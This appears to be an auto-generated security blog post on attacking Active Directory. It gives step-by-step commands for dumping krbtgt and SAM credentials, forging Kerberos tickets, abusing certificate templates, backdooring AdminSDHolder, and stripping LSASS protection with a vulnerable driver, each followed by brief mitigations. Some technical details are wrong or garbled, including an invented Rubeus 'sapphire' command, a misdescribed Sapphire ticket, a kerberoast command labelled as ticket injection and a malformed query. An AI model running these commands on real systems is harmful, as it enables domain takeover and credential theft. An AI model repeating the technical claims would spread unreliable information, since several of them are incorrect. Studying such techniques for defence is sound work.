Listen to this Post

Introduction:
Active Directory (AD) remains the crown jewel of enterprise authentication, yet its complexity breeds critical vulnerabilities like Kerberos delegation misconfigurations and AD Certificate Services (ADCS) flaws. This article dives deep into offensive AD tradecraft—from initial exploitation to advanced persistence—based on the latest training curriculum from Ignite Technologies, featuring newly added DACL abuse, ADCS attacks, and the coveted Sapphire & Diamond Ticket techniques.
Learning Objectives:
- Execute Kerberos-based attacks including Golden, Silver, Diamond, and Sapphire Tickets to forge unauthorized access.
- Perform advanced credential dumping and lateral movement using native Windows tools and Impacket.
- Abuse ACLs and ADCS misconfigurations to escalate privileges and maintain persistence in forest environments.
You Should Know:
- Sapphire & Diamond Ticket Attacks – Bypassing Modern Kerberos Protections
Step‑by‑step guide explaining what this does and how to use it:
What are Diamond and Sapphire Tickets?
- Diamond Ticket: Forges a TGT by re‑encrypting a valid PAC with the krbtgt hash, avoiding detection by security solutions that monitor for unusual ticket flags (e.g., PA DATA values).
- Sapphire Ticket: A variant that manipulates timestamps and cname fields to evade SIEM correlation while maintaining full TGT functionality.
Linux (with Impacket & Rubeus via wine/Cross‑Over):
Extract krbtgt hash from a dump (using secretsdump) impacket-secretsdump -just-dc-ntlm 'domain.com/administrator:password@dc-ip' Example hash: krbtgt:502:aad3b435b51404eeaad3b435b51404ee:xxxxx::: Generate a Diamond Ticket with Rubeus (run on Windows or via wine) Rubeus.exe diamond /krbtgt:<hash> /user:Administrator /domain:domain.com /dc:dc.domain.com /ticketuser:TargetUser /outfile:diamond.kirbi Convert to ccache for Impacket python3 kirbi2ccache.py diamond.kirbi export KRB5CCNAME=diamond.ccache impacket-wmiexec -k -no-pass target.domain.com
Windows (Native + Rubeus):
Load Mimikatz to get krbtgt hash mimikatz.exe "lsadump::lsa /inject /name:krbtgt" "exit" Create Sapphire Ticket (Rubeus) Rubeus.exe sapphire /krbtgt:<NT_hash> /user:Administrator /domain:megacorp.local /dc:dc1.megacorp.local /starttime:<offset> /endtime:<offset+1h> /outfile:sapphire.kirbi Inject ticket Rubeus.exe kerberoast /spn:HTTP/web.megacorp.local /ticket:sapphire.kirbi
Mitigation: Enforce Kerberos Armoring (FAST), regularly rotate krbtgt password twice, and monitor Event IDs 4769 for anomalous TGT requests.
- ADCS Abuse – Escalating to DA via Certificate Templates
Step‑by‑step guide explaining what this does and how to use it:
Overview: Misconfigured certificate templates (e.g., ESC1 – Client Authentication + CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) allow attackers to request a certificate as any user, including Domain Admin.
Enumeration with Certipy (Linux):
certipy find -u '[email protected]' -p 'pass' -dc-ip 10.0.0.1 -vulnerable Identify ESC1-enabled template (e.g., 'WebServer') Request a certificate for Domain Admin certipy req -u '[email protected]' -p 'pass' -target ca.domain.com -template WebServer -upn '[email protected]'
Windows using Certify:
Certify.exe find /vulnerable Certify.exe request /ca:ca.domain.com\CA /template:ESC1-Template /altname:administrator
Convert certificate to hash (TGT):
certipy auth -pfx administrator.pfx -domain domain.com -dc-ip 10.0.0.1
Defense: Disable `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` on templates, require manager approval, enforce SID extension.
3. DACL Abuse – Backdooring AdminSDHolder
Step‑by‑step guide:
Concept: Granting a low-privileged user `GenericWrite` on AdminSDHolder replicates permissions to all protected groups (Domain Admins, etc.) within ~60 min.
PowerView (Windows):
Find modifiable ACLs
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -eq "lowUser"}
Add FullControl to lowUser on AdminSDHolder
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=com' -PrincipalIdentity lowUser -Rights All
BloodHound (Custom Cypher):
MATCH (u:User {name: "[email protected]"})-[r:GenericWrite|WriteOwner|AllExtendedRights]->(g:Group {name: "DOMAIN [email protected]"}) RETURN u,g
Detection: Monitor Event 5136 (Directory Service Changes) on AdminSDHolder and run `Get-ADObject -Filter -SearchBase “CN=AdminSDHolder,CN=System” -Properties ntSecurityDescriptor` periodically.
4. Credential Dumping – Advanced Persistent Memory Extraction
Step‑by‑step guide:
Bypassing LSA Protection (PPL) with Mimikatz:
Install a vulnerable driver (e.g., RTCore64.sys) sc create RTCore64 type= kernel binPath= C:\path\RTCore64.sys sc start RTCore64 Use Mimikatz with driver mimikatz "!+" "!processprotect /process:lsass.exe /remove" "sekurlsa::logonpasswords" "exit"
Linux – Remote Dumping via WMI and Shadow Copies:
impacket-smbexec domain.com/user:pass@dc-ip 'reg save HKLM\SAM c:\sam.save & reg save HKLM\SYSTEM c:\system.save' impacket-smbclient domain.com/user:pass@dc-ip -c 'get c:\sam.save; get c:\system.save' secretsdump -sam sam.save -system system.save LOCAL
Mitigation: Enable LSA Protection (RunAsPPL), enforce Windows Defender Credential Guard, and use Protected Process Light for LSASS.
- Lateral Movement – WinRM, PSRemoting, and WMI Over Kerberos
Step‑by‑step guide:
Using Evil-WinRM (Linux) with ticket:
Convert kirbi to ccache and set KRB5CCNAME python3 kirbi2ccache.py admin_ticket.kirbi export KRB5CCNAME=admin_ticket.ccache evil-winrm -i target.domain.com -r domain.com
Windows native – PowerShell Remoting with alternate credentials:
$secPass = ConvertTo-SecureString 'password' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('domain\admin', $secPass)
Enter-PSSession -ComputerName CORP-SRV01 -Credential $cred -Authentication Kerberos
WMI for stealth:
impacket-wmiexec -k -no-pass [email protected] "whoami /all"
Detection: Enable PowerShell logging (Event 4104), monitor 4648 for explicit logons, and restrict WinRM to jump hosts only.
What Undercode Say:
- Key Takeaway 1: Modern AD security demands shifting from traditional signature-based detection to behavior analytics; Diamond/Sapphire tickets leave anomalies in ticket option flags that can be caught via custom Sysmon rules.
- Key Takeaway 2: ADCS misconfigurations (ESC1–ESC8) are now the fastest path to Domain Admin – audit every certificate template with Certipy or PSPKIAudit.
Analysis: The training curriculum from Ignite Technologies underscores a critical industry pivot: attackers no longer rely on eternal exploits but abuse legitimate protocol features (Kerberos, certificates, ACLs). The addition of “Sapphire” tickets reveals an evolution in evasion – manipulating timestamp jitter and cname fields to bypass even advanced EDRs. Defenders must adopt a zero‑trust posture: regular krbtgt rotation, SID filtering for trust boundaries, and continuous monitoring of ADCS enrollment logs. For blue teams, understanding these attacks is the only way to build effective deception – like creating honeytokens in ACLs or fake certificate templates to catch low‑noise intrusions.
Prediction:
Within 18 months, Sapphire‑style ticket forging will be weaponized by ransomware gangs to accelerate lateral movement from days to minutes, forcing Microsoft to introduce mandatory FAST armoring by default. ADCS will emerge as the next “PrintNightmare” – pushing organizations to implement certificate auto‑enrollment with strict issuance policies. Offensive training like this will become mandatory for SOC analysts, not just pentesters, as tomorrow’s attacks will blend Kerberos forgery with cloud‑synchronized identities (Entra ID). Prepare to see “Hybrid Ticket” attacks that bridge on‑prem AD and Azure AD Kerberos trust.
▶️ Related Video (82% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Active Directory – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


